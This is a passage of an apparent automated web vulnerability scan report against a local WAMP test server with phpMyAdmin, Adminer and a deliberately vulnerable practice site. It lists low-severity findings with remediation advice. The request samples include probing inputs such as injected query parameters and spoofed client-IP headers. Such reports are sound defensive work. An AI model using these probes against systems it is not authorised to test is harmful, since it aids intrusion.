Static analysis

Data is read from document.cookie and passed to JSON.parse() via the following statements:
6. Password submitted using GET method
Previous  Next

There are 2 instances of this issue:

Issue background

Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, applications should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Vulnerability classifications



6.1. http://localhost/examplewebiste/vulnerabilities/brute/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request 1

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</h2>

       <form action="#" method="GET">
           Username:<br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password"><br />
...[SNIP]...
6.2. http://localhost/examplewebiste/vulnerabilities/csrf/
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request 1

GET /examplewebiste/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:22:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4269
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
<br />

       <form action="#" method="GET">
           New password:<br />
           <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
...[SNIP]...
7. Open redirection (DOM-based)
Previous  Next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js

Issue detail

The application may be vulnerable to DOM-based open redirection. Data is read from location.href and passed to location.href.

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based open redirection arises when a script writes controllable data into the target of a redirection in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Note: If an attacker is able to control the start of the string that is passed to the redirection API, then it may be possible to escalate this vulnerability into a JavaScript injection attack, by using a URL with the javascript: pseudo-protocol to execute arbitrary script code when the URL is processed by the browser.

We automatically identifie this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based open redirection vulnerabilities is not to dynamically set redirection targets using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a redirection target. In general, this is best achieved by using a whitelist of URLs that are permitted redirection targets, and strictly validating the target against this list before performing the redirection.

Vulnerability classifications

Request 1

GET /phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "408a-574048eead880"
Accept-Ranges: bytes
Content-Length: 16522
Connection: close
Content-Type: application/javascript

/*!
* jQuery hashchange event - v1.3 - 7/21/2010
* http://benalman.com/projects/jquery-hashchange-plugin/
*
* Copyright (c) 2010 "Cowboy" Ben Alman
* Dual licensed under the MIT and GPL licenses
...[SNIP]...
( hash !== last_hash ) {
history_set( last_hash = hash, history_hash );

$(window).trigger( str_hashchange );

} else if ( history_hash !== last_hash ) {
location.href = location.href.replace( /#.*/, '' ) + history_hash;
}

timeout_id = setTimeout( poll, $.fn[ str_hashchange ].delay );
};

// vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
// vvvvvvvvvvvvvvvvv
...[SNIP]...

Static analysis

Data is read from location.href and passed to location.href via the following statement:
8. Open redirection (reflected DOM-based)
Previous  Next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/url.php

Issue detail

The application may be vulnerable to reflected DOM-based open redirection.

The value of the url request parameter is copied into a JavaScript string literal. The payload qhqxt/igdtb was submitted in the url parameter.

The string containing the payload is then passed to window.location.

Issue background

Reflected DOM-based vulnerabilities arise when data is copied from a request and echoed into the application's immediate response within a part of the DOM that is then processed in an unsafe way by a client-side script. An attacker can leverage the reflection to control a part of the response (for example, a JavaScript string) that can be used to trigger the DOM-based vulnerability.

DOM-based open redirection arises when a script writes controllable data into the target of a redirection in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Note: If an attacker is able to control the start of the string that is passed to the redirection API, then it may be possible to escalate this vulnerability into a JavaScript injection attack, by using a URL with the javascript: pseudo-protocol to execute arbitrary script code when the URL is processed by the browser.

We automatically identifie this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based open redirection vulnerabilities is not to dynamically set redirection targets using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a redirection target. In general, this is best achieved by using a whitelist of URLs that are permitted redirection targets, and strictly validating the target against this list before performing the redirection.

Vulnerability classifications

Request 1

GET /phpmyadmin/url.php?url=https%3a%2f%2fwww.phpmyadmin.net%2fqhqxt%2figdtb HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=gjpt8vdn3qa2itqo688fpnre2b

Response 1

HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 17:05:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=kfek0npqpim2ql4ghle5pr39sj; path=/phpmyadmin/; HttpOnly
Expires: Fri, 19 Oct 2018 17:05:33 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Fri, 19 Oct 2018 17:05:33 +0000
Set-Cookie: phpMyAdmin=kfek0npqpim2ql4ghle5pr39sj; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 205
Connection: close
Content-Type: text/html; charset=utf-8

<script type='text/javascript'>
window.onload=function(){
window.location='https://www.phpmyadmin.net/qhqxt/igdtb';
}
</script>Taking you to the target
...[SNIP]...

Static analysis

Data is read from https://www.phpmyadmin.net/qhqxt/igdtb and passed to window.location via the following statement:
9. Password field with autocomplete enabled
Previous  Next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:This issue was found in multiple locations under the reported path.

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

Vulnerability classifications

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:01:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjM2M2NlMjQ3Y2E0Mzc2Nzg0OTc5ZjI5MTc3NmRkMTM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
</div>
<form action='' method='post'>
<div>
...[SNIP]...
<td><input type="password" name="auth[password]">
<tr>
...[SNIP]...

Request 2

GET /phpmyadmin/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=d98ucla1mm99d9j47t7dpjp30s; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=d98ucla1mm99d9j47t7dpjp30s; path=/phpmyadmin/; HttpOnly
Set-Cookie: pma_lang=en; expires=Sat, 17-Nov-2018 21:01:53 GMT; Max-Age=2592000; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=fkfnc9n6fi8pt5dg5pbk62ulir; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14490
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<!-- Login form -->
<form method="post" id="login_form" action="index.php" name="login_form" class="disableAjax login hide js-show">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" />
</div>
...[SNIP]...

Request 3

GET /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=mtg310gqac7ps1060n42svigii; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=mtg310gqac7ps1060n42svigii; path=/phpmyadmin/; HttpOnly
Set-Cookie: pma_lang=en; expires=Sat, 17-Nov-2018 21:01:53 GMT; Max-Age=2592000; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=oaovt97e8rv9r4i0uskgc22imq; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14508
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<!-- Login form -->
<form method="post" id="login_form" action="index.php" name="login_form" class="disableAjax login hide js-show">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" />
</div>
...[SNIP]...
10. Link manipulation (DOM-based)
Previous  Next

There are 2 instances of this issue:

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based link manipulation arises when a script writes controllable data to a navigation target within the current page, such as a clickable link or the submission URL of a form. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will modify the target of links within the response. An attacker may be able to leverage this to perform various attacks, including:

We automatically identifie this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based link manipulation vulnerabilities is not to dynamically set the target URLs of links or forms using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a link target. In general, this is best achieved by using a whitelist of URLs that are permitted link targets, and strictly validating the target against this list before setting the link target.

Vulnerability classifications



10.1. http://localhost/phpmyadmin/doc/html/search.html
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The application may be vulnerable to DOM-based link manipulation. Data is read from location.href and passed to the 'href' property of a DOM element.

Request 1

GET /phpmyadmin/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "e4e-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 3662
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_static/jquery.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:31:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "413ac-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 267180
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v3.1.1
* https://jquery.com/
*
* Includes Sizzle.js
* https://sizzlejs.com/
*
* Copyright jQuery Foundation and other contributors
* Released under the MIT lice
...[SNIP]...
t-prolog char sequence (#10098); must appease lint and evade compression
   allTypes = "*/".concat( "*" ),

   // Anchor tag for parsing the document origin
   originAnchor = document.createElement( "a" );
   originAnchor.href = location.href;

// Base "constructor" for jQuery.ajaxPrefilter and jQuery.ajaxTransport
function addToPrefiltersOrTransports( structure ) {

   // dataTypeExpression is optional and defaults to "*"
   return function( d
...[SNIP]...

Static analysis

Data is read from location.href and passed to the 'href' property of a DOM element via the following statement:
10.2. http://localhost/phpmyadmin/doc/html/search.html
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The application may be vulnerable to DOM-based link manipulation. Data is read from document.location.href and passed to the 'href' property of a DOM element.

Request 1

GET /phpmyadmin/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "e4e-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 3662
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_static/jquery.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:31:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "413ac-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 267180
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v3.1.1
* https://jquery.com/
*
* Includes Sizzle.js
* https://sizzlejs.com/
*
* Copyright jQuery Foundation and other contributors
* Released under the MIT lice
...[SNIP]...
MLDocument( "" );

           // Set the base href for the created document
           // so any parsed elements with URLs
           // are based on the document's URL (gh-2965)
           base = context.createElement( "base" );
           base.href = document.location.href;
           context.head.appendChild( base );
       } else {
           context = document;
       }
   }

   parsed = rsingleTag.exec( data );
   scripts = !keepScripts && [];

   // Single tag
   if ( parsed ) {
       return [ context.cre
...[SNIP]...

Static analysis

Data is read from document.location.href and passed to the 'href' property of a DOM element via the following statement:
11. Client-side HTTP parameter pollution (reflected)
Previous  Next

There are 2 instances of this issue:

Issue background

Client-side HTTP parameter pollution (HPP) vulnerabilities arise when an application embeds user input in URLs in an unsafe manner. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify URLs within the response by inserting additional query string parameters and sometimes overriding existing ones. This may result in links and forms having unexpected side effects. For example, it may be possible to modify an invitation form using HPP so that the invitation is delivered to an unexpected recipient.

The security impact of this issue depends largely on the nature of the application functionality. Even if it has no direct impact on its own, an attacker may use it in conjunction with other vulnerabilities to escalate their overall severity.

Issue remediation

Ensure that user input is URL-encoded before it is embedded in a URL.

References

Vulnerability classifications



11.1. http://localhost/ [lang parameter]
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the response within the query string of a URL.

The payload eqz&asn=1 was submitted in the lang parameter. This input was echoed unmodified within the "href" attribute of an "a" tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary query string parameters into URLs in the application's response.

Request 1

GET /?lang=eqz%26asn%3d1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5580
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=eqz&asn=1'>
...[SNIP]...
11.2. http://localhost/add_vhost.php [lang parameter]
Previous  Next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the response within the query string of a URL.

The payload qpm&lrd=1 was submitted in the lang parameter. This input was echoed unmodified within the "href" attribute of an "a" tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary query string parameters into URLs in the application's response.

Request 1

GET /add_vhost.php?lang=qpm%26lrd%3d1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4965
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=qpm&lrd=1">
...[SNIP]...
12. Source code disclosure
Previous  Next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.This issue was found in multiple locations under the reported path.

Issue background

Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. Review the cause of the code disclosure and prevent it from happening.

Vulnerability classifications

Request 1

GET /phpmyadmin/doc/html/_sources/config HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
